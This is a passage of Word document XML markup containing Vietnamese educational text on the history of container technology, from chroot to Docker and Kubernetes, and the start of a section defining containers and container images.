      </w:r>
    </w:p>
    <w:p w14:paraId="6AF144F6" w14:textId="20D3C274" w:rsidR="002B4188" w:rsidRPr="005062A7" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc233498132"/>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1</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:t>. Sơ lược lịch sử hình thành công nghệ Container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="225B29E3" w14:textId="2B36B9C1" w:rsidR="002B4188" w:rsidRPr="00D9170A" w:rsidRDefault="00D9170A" w:rsidP="008C6FBD">
      <w:r w:rsidRPr="00D9170A">
        <w:t xml:space="preserve">Lịch sử công nghệ container phát triển từ các ý tưởng sơ khai như chroot (1979) qua các bước tiến của FreeBSD Jails và OpenVZ. Nền tảng quan trọng được thiết lập khi Google giới thiệu cgroups, dẫn đến sự ra đời của LXC. Đến năm 2013, Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9170A">
        <w:lastRenderedPageBreak/>
        <w:t>đã chuẩn hóa quy trình đóng gói, tiếp nối bởi Kubernetes (2014) giúp điều phối hệ thống ở quy mô lớn. Hiện nay, Kubernetes là chuẩn mực ngành dưới sự quản lý của CNCF, với xu hướng tương lai tập trung vào các kiến trúc siêu trừu tượng, Serverless, bảo mật DevSecOps và điện toán biên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F567C04" w14:textId="579CA86F" w:rsidR="009F2546" w:rsidRDefault="009F2546" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc233498084"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Khái niệm Container và Container Image</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0969E9B2" w14:textId="5594B05A" w:rsidR="00D9170A" w:rsidRPr="00D9170A" w:rsidRDefault="00D9170A" w:rsidP="00D9170A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Theo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nghĩa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chuẩn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>từ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IBM, Container </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đơn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vị</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phần</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mềm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gồm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đầy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đủ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mã</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nguồn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thành</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phần</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phụ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thuộc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giúp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ứng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dụng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vận</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hành</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ổn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mọi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nền</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tảng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hiện</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hóa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>điều</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Container Image </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đóng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trò</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khuôn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mẫu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tĩnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (read-only), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chứa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đựng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toàn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bộ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chỉ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dẫn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cài</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đặt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cấu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phần</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cần</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thiết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Thông qua </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cơ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chế</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xếp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chồng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9170A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lớp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
